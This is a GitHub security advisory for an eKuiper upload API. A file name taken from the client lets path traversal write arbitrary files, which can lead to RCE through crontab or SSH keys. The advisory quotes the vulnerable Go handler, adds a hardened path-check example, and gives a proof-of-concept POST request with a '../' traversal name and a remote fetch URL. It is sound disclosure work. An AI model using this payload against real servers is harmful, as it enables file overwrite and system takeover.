GHSA-gj54-gwj9-x2c6

Source
https://github.com/advisories/GHSA-gj54-gwj9-x2c6
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-gj54-gwj9-x2c6/GHSA-gj54-gwj9-x2c6.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-gj54-gwj9-x2c6
Published
2025-07-03T14:22:05Z
Modified
2025-07-03T14:22:05Z
Severity
  • 7.3 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
Summary
eKuiper /config/uploads API arbitrary file writing may lead to RCE
Details

Summary

The eKuiper /config/uploads API accepts a remote web URL and saves the fetched file in the local upload directory, but applies no security restrictions to the supplied file name, so ../ sequences allow arbitrary file writes. If the service runs with root privileges, RCE can be achieved by writing crontab files or SSH keys.

Details

// Excerpt of the eKuiper upload handler quoted by the advisory; the surrounding
// declarations (fileContent, upload, handleError, logger, uploadDir) are not shown.
func fileUploadHandler(w http.ResponseWriter, r *http.Request) {
    switch r.Method {
    // Upload or overwrite a file
    case http.MethodPost:
        switch r.Header.Get("Content-Type") {
        case "application/json":
            fc := &fileContent{}
            defer r.Body.Close()
            err := json.NewDecoder(r.Body).Decode(fc)
            if err != nil {
                handleError(w, err, "Invalid body: Error decoding file json", logger)
                return
            }
            // Validate() reports missing fields (per its error message) but does
            // not sanitise the value of fc.Name.
            err = fc.Validate()
            if err != nil {
                handleError(w, err, "Invalid body: missing necessary field", logger)
                return
            }

            // fc.Name comes straight from the request body, so a name such as
            // "../../../../tmp/success" resolves to a path outside uploadDir.
            filePath := filepath.Join(uploadDir, fc.Name)
            err = upload(fc)

- The fc.Name parameter is not safely filtered.
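A hardened replacement for the filepath.Join call shown above, added here as an example; it is not eKuiper's code and not the project's own fix. The upload directory path and the file names in main are constructed, and safeUploadPath and ErrUnsafeName are names chosen for this example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrUnsafeName is returned for any upload name that would not stay inside uploadDir.
var ErrUnsafeName = errors.New("upload name escapes the upload directory")

// safeUploadPath is a hardened stand-in for the advisory's
// filepath.Join(uploadDir, fc.Name): it resolves the requested name under
// uploadDir and refuses anything that climbs out of it.
func safeUploadPath(uploadDir, name string) (string, error) {
	// Empty names, NUL bytes and absolute names are never legitimate upload names.
	if name == "" || strings.ContainsRune(name, 0) || filepath.IsAbs(name) {
		return "", ErrUnsafeName
	}
	base, err := filepath.Abs(uploadDir)
	if err != nil {
		return "", err
	}
	// Join cleans the result, so "../" segments are collapsed against base here;
	// comparing the cleaned target back to base is what exposes the escape.
	target := filepath.Join(base, name)
	rel, err := filepath.Rel(base, target)
	if err != nil {
		return "", err
	}
	// rel must be a plain descendant: not base itself and not starting with "..".
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrUnsafeName
	}
	return target, nil
}

func main() {
	// Constructed inputs: the advisory's PoC name alongside benign ones.
	// The upload directory is an assumed example path, not eKuiper's default.
	for _, n := range []string{"success.txt", "sub/../ok.json", "../../../../tmp/success"} {
		p, err := safeUploadPath("/var/lib/ekuiper/uploads", n)
		fmt.Printf("%-26q -> path=%q err=%v\n", n, p, err)
	}
}
```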

PoC

POST /config/uploads HTTP/1.1
Host: localhost:9081
Content-Type: application/json
Content-Length: 89

{
  "name": "../../../../tmp/success",
  "file": "http://192.168.65.254:8888/success"
}


Impact

Tested and verified only on 1.14.3 and 1.14.1; in theory, all versions that contain this code are affected.

  1. SSRF
  2. Path traversal
  3. May lead to RCE

The reporter is m0d9 from Tencent YunDing Lab.

Database specific
{
    "github_reviewed": true,
    "nvd_published_at": null,
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-434"
    ],
    "github_reviewed_at": "2025-07-03T14:22:05Z"
}
References

Affected packages

Go / github.com/lf-edge/ekuiper/v2

Package

Name
github.com/lf-edge/ekuiper/v2
Purl
pkg:golang/github.com/lf-edge/ekuiper/v2

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
2.2.0

Go / github.com/lf-edge/ekuiper

Package

Name
github.com/lf-edge/ekuiper
Purl
pkg:golang/github.com/lf-edge/ekuiper

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Last affected
1.14.7